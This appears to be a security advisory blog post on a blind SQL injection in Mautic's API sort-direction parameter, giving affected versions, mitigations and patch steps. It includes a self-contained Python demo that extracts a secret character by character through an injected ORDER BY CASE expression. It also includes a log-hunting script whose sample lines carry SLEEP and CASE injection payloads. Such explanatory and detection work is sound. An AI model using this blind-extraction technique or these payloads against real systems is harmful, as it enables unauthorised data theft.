
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2026-3105: Mautic SQLi: When "Order By" Becomes "Pwned By"


Vulnerability ID: CVE-2026-3105
CVSS Score: 7.6
Published: 2026-02-25

Mautic, the widely used open-source marketing automation platform, recently patched a high-severity SQL injection vulnerability (CVE-2026-3105) that turns a mundane API sorting feature into a database exfiltration channel. Because the application did not validate the sort direction (which should only ever be ASC or DESC) before placing it in the query, an authenticated API user could append arbitrary SQL expressions to the ORDER BY clause. This matters even with an ORM in play: prepared statements can bind values, but not SQL keywords such as ASC/DESC, so a sort direction that is not checked against an allowlist ends up concatenated straight into the query text. This deep dive explores how a classic ORDER BY injection works in that setting and why strict input validation remains the only real defence for this class of bug.

TL;DR

Unvalidated input in Mautic's API sort direction parameter allows blind SQL injection through the ORDER BY clause. An authenticated API user can exfiltrate sensitive marketing data one boolean or timing probe at a time. Fixed in versions 4.4.19, 5.2.10, 6.0.8, and 7.0.1.


⚠️ Exploit Status: PoC

Technical Details

  • CWE ID: CWE-89 (SQL Injection)
  • CVSS Score: 7.6 (High)
  • Attack Vector: Network (API)
  • Privileges Required: Low (Authenticated API User)
  • Exploit Status: PoC Available (Theoretical)
  • Confidentiality Impact: High

Affected Systems

  • Mautic Marketing Automation
  • Mautic: >= 2.10.0 < 4.4.19 (Fixed in: 4.4.19)
  • Mautic: >= 5.0.0 < 5.2.10 (Fixed in: 5.2.10)
  • Mautic: >= 6.0.0 < 6.0.8 (Fixed in: 6.0.8)
  • Mautic: >= 7.0.0 < 7.0.1 (Fixed in: 7.0.1)

Exploit Details

  • NVD: Blind SQL injection via sort parameter.

Mitigation Strategies

  • Input Validation (Allowlisting): accept only ASC or DESC (case-insensitive, trimmed) and interpolate the canonical token, never the caller's string. This is the actual fix; the value cannot be bound as a prepared-statement parameter.
  • WAF Filtering: a stop-gap only. Blind ORDER BY payloads need not contain SELECT, SLEEP or parentheses, so keyword rules will miss some of them.
  • Database Least Privilege: give the Mautic database account no rights beyond its own schema, so a blind read cannot reach other databases or administrative tables.
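To make the mechanism from the introduction and the allowlist mitigation above concrete, here is an added example written for this article. It is not Mautic's code and not Mautic's schema (Mautic runs Doctrine on MySQL/MariaDB; this uses SQLite purely so it runs stand-alone). The leads table, its rows, the api_secret column and all function names are constructed. The block shows the bug class (a sort direction concatenated into ORDER BY), a boolean-based blind probe that uses an injected CASE expression to flip the tie-break order and leak a secret one character at a time, and the hardened version that allowlists the direction.

```python
import sqlite3

# Constructed demo schema, not Mautic's: a "leads" table whose 'stage' column
# has ties so that an injected secondary ORDER BY key can change the row order.
SAMPLE_LEADS = [
    (1, "alice@example.com", "new", "s3cr3t"),
    (2, "bob@example.com", "new", "hunter2"),
    (3, "carol@example.com", "new", "letmein"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE leads (id INTEGER PRIMARY KEY, email TEXT, stage TEXT, api_secret TEXT)"
    )
    conn.executemany("INSERT INTO leads VALUES (?, ?, ?, ?)", SAMPLE_LEADS)
    return conn


def list_emails_vulnerable(conn, direction):
    # The bug class: ASC/DESC cannot be a bound parameter, so the value is
    # concatenated into the SQL text without any check. Whatever the caller
    # sends becomes part of the ORDER BY clause.
    sql = f"SELECT email FROM leads ORDER BY stage {direction}"
    return [row[0] for row in conn.execute(sql)]


ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def list_emails_hardened(conn, direction):
    # Allowlist: normalise, compare against the two legal tokens, and only
    # then interpolate the canonical token (never the caller's string).
    token = direction.strip().upper()
    if token not in ALLOWED_DIRECTIONS:
        raise ValueError(f"invalid sort direction: {direction!r}")
    sql = f"SELECT email FROM leads ORDER BY stage {token}"
    return [row[0] for row in conn.execute(sql)]


def boolean_oracle(conn, condition):
    # Boolean-based blind probe: the injected CASE flips the tie-break order,
    # so the first row returned tells the attacker whether `condition` held.
    payload = f"ASC, (CASE WHEN ({condition}) THEN id ELSE -id END)"
    first = list_emails_vulnerable(conn, payload)[0]
    return first == "alice@example.com"  # id 1 sorts first only when TRUE


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def exfiltrate_secret(conn, lead_id, max_len=32):
    # Recover api_secret one character at a time through the oracle; stops
    # when no character matches (substr() past the end returns '').
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = (f"(SELECT substr(api_secret, {pos}, 1) FROM leads "
                    f"WHERE id = {lead_id}) = '{ch}'")
            if boolean_oracle(conn, cond):
                recovered += ch
                break
        else:
            return recovered
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("legit DESC :", list_emails_hardened(conn, "desc"))
    print("exfiltrated:", exfiltrate_secret(conn, 1))
    try:
        list_emails_hardened(conn, "ASC, (CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as exc:
        print("hardened rejects:", exc)
```

The probe works because the injection point sits after the first sort key: the attacker cannot change that key, but can add a second one, and any column with duplicate values lets the second key decide the order. That is why the same payload leaks data on a real CRM, where many records share a stage, owner or country. Note also that the hardened function rejects the input instead of trying to strip suspicious characters; a "sanitised" direction is still not a direction.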

Remediation Steps:

  1. Identify your current Mautic version.
  2. Backup your database and codebase.
  3. Apply the vendor patch: Update to 4.4.19, 5.2.10, 6.0.8, or 7.0.1.
  4. Verify the update by checking the version in the footer or app/version.txt.
  5. Review API logs for past requests in which the sort direction parameter ('dir') holds anything other than ASC or DESC. 'SELECT', 'SLEEP' and parentheses are common tells, but a boolean-based payload such as a CASE expression may contain none of them, so do not rely on keywords alone.
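Step 5 is easier to apply with a script than with grep. The following is an added example, not part of the original report and not Mautic's tooling: it runs two rules over constructed access-log lines in combined format. The parameter names dir and orderByDir are assumptions (adjust CANDIDATE_PARAMS to whatever your deployment actually logs), and the IPs and timestamps are made up. It shows that the keyword rule misses payloads that contain none of SELECT, SLEEP or parentheses, while a strict "anything but ASC/DESC" rule catches every one of them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined format); not real Mautic traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Feb/2026:10:01:02 +0000] "GET /api/contacts?orderBy=stage&dir=ASC HTTP/1.1" 200 1532
203.0.113.5 - - [25/Feb/2026:10:01:09 +0000] "GET /api/contacts?orderBy=stage&dir=desc HTTP/1.1" 200 1532
198.51.100.7 - - [25/Feb/2026:10:02:14 +0000] "GET /api/contacts?orderBy=stage&dir=ASC%2C(SELECT%20SLEEP(5)) HTTP/1.1" 200 1532
198.51.100.7 - - [25/Feb/2026:10:02:40 +0000] "GET /api/contacts?orderBy=stage&dir=ASC%2CCASE%20WHEN%20id%3D1%20THEN%20id%20ELSE%20-id%20END HTTP/1.1" 200 1532
198.51.100.7 - - [25/Feb/2026:10:03:01 +0000] "GET /api/contacts?orderBy=stage&dir=DESC%2Cid HTTP/1.1" 200 1532
198.51.100.7 - - [25/Feb/2026:10:03:30 +0000] "GET /api/contacts?search=alice HTTP/1.1" 200 1532
"""

# Assumed parameter names for the sort direction; change to match your logs.
CANDIDATE_PARAMS = ("dir", "orderByDir")
LEGAL_DIRECTIONS = {"ASC", "DESC"}
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|PUT|PATCH|DELETE) (\S+) HTTP/'
)


def extract_sort_dirs(line):
    """Return (client_ip, timestamp, decoded sort-direction value) or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, target = m.groups()
    qs = parse_qs(urlsplit(target).query)  # percent-decodes the value
    for name in CANDIDATE_PARAMS:
        if name in qs:
            return ip, ts, qs[name][0]
    return None


def keyword_rule(value):
    # The advisory's suggested check: look for SELECT, SLEEP or parentheses.
    v = value.upper()
    return "SELECT" in v or "SLEEP" in v or "(" in v


def strict_rule(value):
    # Anything other than a bare ASC/DESC (case-insensitive, trimmed) is not
    # a sort direction and should never have reached the query builder.
    return value.strip().upper() not in LEGAL_DIRECTIONS


def hunt(log_text, rule):
    """Return every (ip, timestamp, value) whose sort direction trips `rule`."""
    hits = []
    for line in log_text.splitlines():
        parsed = extract_sort_dirs(line)
        if parsed and rule(parsed[2]):
            hits.append(parsed)
    return hits


if __name__ == "__main__":
    for name, rule in (("keyword", keyword_rule), ("strict", strict_rule)):
        print(f"--- {name} rule ---")
        for ip, ts, value in hunt(SAMPLE_LOG, rule):
            print(f"{ts} {ip} dir={value!r}")
```

On the sample above the keyword rule flags only the SLEEP request, while the strict rule also surfaces the CASE-based boolean probe and the bare "DESC,id" test that an attacker typically sends first to confirm the injection. Decode the query string before matching, as done here; a grep for "SELECT" on the raw log line would miss URL-encoded variants.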

Read the full report for CVE-2026-3105 on our website for more details including interactive diagrams and full exploit analysis.
